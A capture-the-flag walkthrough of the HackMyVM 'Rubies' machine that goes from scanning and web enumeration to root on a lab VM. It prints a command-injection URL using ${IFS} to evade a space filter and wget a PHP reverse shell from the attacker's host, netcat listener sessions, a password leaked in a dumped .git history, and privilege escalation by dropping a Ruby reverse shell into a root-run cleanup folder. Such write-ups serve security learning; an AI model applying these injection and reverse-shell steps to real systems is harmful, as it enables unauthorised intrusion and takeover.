HackMyVM - Rubies

 

Rubies is a Medium difficulty machine that has some really useful techniques to understand.
As always there are different methods to achieve the same outcome, this is just the way I did it.

Find it

└─$ sudo netdiscover -r 10.0.0.0/24 -P|tee findit

[sudo] password for kali: 

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 10.0.0.1        08:00:27:95:67:5b      1      60  PCS Systemtechnik GmbH

 10.0.0.113      08:00:27:95:1d:09      1      60  PCS Systemtechnik GmbH

-- Active scan completed, 2 Hosts found.

 

Scan it

└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.113

# Nmap 7.91 scan initiated Thu Dec 30 09:38:13 2021 as: nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.113

Nmap scan report for 10.0.0.113

Host is up (0.00069s latency).

Not shown: 65533 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey: 

|   2048 54:65:0b:7a:f3:5c:2f:1f:14:9e:bb:0e:44:0c:af:29 (RSA)

|   256 1f:5d:63:05:65:f7:cf:70:e4:0d:0a:45:80:77:50:2c (ECDSA)

|_  256 69:a2:0f:83:dc:19:f2:c1:72:9c:a3:f8:09:44:3e:36 (ED25519)

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

| http-git: 

|   10.0.0.113:80/.git/

|     Git repository found!

|     Repository description: Unnamed repository; edit this file 'description' to name the...

|_    Last commit message: Why minnie? 

|_http-server-header: Apache/2.4.18 (Ubuntu)

|_http-title: Cute Cat Only

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Thu Dec 30 09:38:28 2021 -- 1 IP address (1 host up) scanned in 15.13 seconds

So ssh, and a webserver that has a git repo, but worth a quick gobuster scan to see if there is anything else.

└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.113 -x html,php,txt -t 150

 -r -u http://10.0.0.113 -x html,php,txt -t 150                

===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://10.0.0.113

[+] Method:                  GET

[+] Threads:                 150

[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.1.0

[+] Extensions:              html,php,txt

[+] Follow Redirect:         true

[+] Timeout:                 10s

===============================================================

2022/01/15 05:15:02 Starting gobuster in directory enumeration mode

===============================================================

/bg                   (Status: 200) [Size: 923]

/index.php            (Status: 200) [Size: 742]

/uploads              (Status: 200) [Size: 1133]

/javascript           (Status: 403) [Size: 275] 

/poems                (Status: 200) [Size: 1692]

/server-status        (Status: 403) [Size: 275] 

 

Looking at the webpage and putting what has been discovered together, the webpage has a 'Next' button that displays a random poem. The poems directory contains files that match the poems so it could be reading a file and allow us to exploit it. 

Playing around with different URL's and we can read files OK.

Adding a ;id to the path shows the id of www-data so we can execute commands too...
however the code seems to detect RCE if there is a space in the URL so we just need to replace a space with $IFS or ${IFS} to bypass this.

Armed with this I use a php reverse shell php file from:

https://github.com/pentestmonkey/php-reverse-shell

Edit it with my IP and port number
Start a simple Python webserver to allow the target to download it and then execute it

http://10.0.0.113/index.php?poem=poem1;wget${IFS}-O${IFS}/tmp/rs.php${IFS}http://10.0.0.10:8000/rs.php

┌──(kali㉿kali)-[~/rubies]

└─$ nc -nvlp 4444 

connect to [10.0.0.10] from (UNKNOWN) [10.0.0.113] 54728

Linux rubies 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

 19:07:56 up 57 min,  1 user,  load average: 0.00, 0.00, 0.95

USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT

minnie   pts/0    10.0.0.10        18:56    2:27   0.28s  0.28s /bin/bash

uid=33(www-data) gid=33(www-data) groups=33(www-data)

bash: cannot set terminal process group (2190): Inappropriate ioctl for device

bash: no job control in this shell

www-data@rubies:/$ 

So I have a shell but no credentials yet.... but is there anything in the git repo ?

https://github.com/internetwache/GitTools has some cool tools to clone a git repo from a webpage.

(Big thanks to 4treetwo / nine for the hint and pointing me to this tool!)

./GitTools/Dumper/gitdumper.sh http://10.0.0.113/.git/ git

changing to the git directory and running:

└─$ git show HEAD  

shows the history that includes some credentials...

diff --git a/index.php b/index.php

index 41f0f2f..d33ca0d 100644

--- a/index.php

+++ b/index.php

@@ -8,33 +8,6 @@ if(isset($_GET['poem'])){

                $output = shell_exec("cat poems/".$input);

        }

 }

-

-

-// we dont need a login page dangit minnie! follow my orders pls

-$servername = "localhost";

-$username = "root";

-$password = "jd92    ";

So 'minnie' used the same password as the user account.
Just need to stabilise the session to allow su to work.

python3 -c 'import pty; pty.spawn("/bin/sh")'

and then su to minnie with the found password

minnie's shell is a Ruby Interactive shell (irb) so just spawn a bash shell with the command:

exec("/bin/bash")

Escalate to root.

pspy64 shows root executing a task every minute... but didn't tell me exactly what..

minnie@rubies:/tmp$ ./pspy64 

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855

     ██▓███    ██████  ██▓███ ▓██   ██▓

    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒

    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░

    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░

    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░

    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 

    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 

    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  

                   ░           ░ ░     

                               ░ ░     

Using linpeas.sh and looking around at files owned by or with group rights to minnie identifies /opt/cleaning as an interesting folder minnie has rights to create inside.

minnie@rubies:/opt/cleaning$ ls -al

total 12

drwxrwxr-x 2 root minnie 4096 Jan 15 20:03 .

drwxr-xr-x 3 root root   4096 Nov  2  2020 ..

-rw-r--r-- 1 root root    108 Nov  2  2020 webserver_upload.rb

minnie@rubies:/opt/cleaning$ cat webserver_upload.rb 

require "find"

Find.find("/var/www/html/uploads/") do |file|

  File.delete("#{file}") if file=~/\.php/

end

minnie@rubies:/opt/cleaning$ 

As we dont see this code specificaly executed by pspy it could be called from another script and people tend to reuse code so it may just execute any .rb file in the folder.

After testing this by getting it to creat a file in /tmp I just downloaded and edited:

https://github.com/secjohn/ruby-shells/blob/master/revshell.rb

setup another reverse listener first and then put the revshell.rb file inside /opt/cleaning/ and got a root shell within a minute.

└─$ nc -nvlp 5555

listening on [any] 5555 ...

connect to [10.0.0.10] from (UNKNOWN) [10.0.0.113] 41382

We are connected!

id

uid=0(root) gid=0(root) groups=0(root)

hostname

rubies

Overall this was a really nice box to play with.